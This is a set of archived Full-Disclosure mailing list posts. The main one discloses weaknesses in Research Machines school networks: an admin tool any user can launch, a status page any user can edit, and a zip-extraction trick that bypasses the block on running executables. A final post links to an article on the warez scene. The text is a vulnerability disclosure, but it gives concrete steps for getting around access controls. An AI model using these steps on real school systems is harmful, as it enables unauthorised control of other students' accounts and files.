here: http://www.wheresthebeef.co.uk/?p=hat I hope some people have found this useful. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Research Machines(RM) Networks / Setup
Research Machines (RM) are The Leading Supplier of Software, Services and Systems to UK Education. Mainly seen in High Schools in the UK. The following was revealed too them well over 6 months ago. I received no reply from my email. a) Publicly Availiable Admin Tools b) Publicily Writable Status Manager c) .EXE Executions a) The administration tools used to monitor students while they work and that can also be used to control student's computers, modify student's files and even change passwords is installed on every single computer and can be executed by every single user. I've found this to be true of around 200 computers (located in different rooms, installed at different times) at my school. The program can be found in its default location here: C:\Program Files\Research Machines\RM Tutor 2\Controller\TeacherLaunch.exe b) The 'RM Status Manager' is a script that allows you to view your remaining printer credits, remaining quota space, etc. This file is simply a html/vbscript file located on every computer's hdd. It can be accessed AND edited at its default location: C:\RMExplorerURL\Status.htm Obviously this has many security implications, especially if an outdated version of Internet Explorer (which is used to view this file) is installed. c) Execution of .exe located from the user's home directory (N:) is restricted by default. This can be defeated by using Windows XP's zipping feature and adding the .exe file to a .zip file and THEN opening the .zip file and running the .exe 'from' the .zip file. This will cause windows the extract the .exe file to a default temporary directory, the default temporary directory is on C: ! Which means we have rights execute it. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Short Paper on the warez scene
Hi, I wrote a short paper/article on the warez scene for 2600 magazine (www.2600.com) It contains some valuable information about who is hacking you and why, thought this may interest some of you (especiall the many i've seen on here who have found an unknown FTP server on their computer). A scan from 2600 magazine is availiable here: http://www.wheresthebeef.co.uk/2600_Guide_to_Internet_Piracy-TYDJ.zip ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html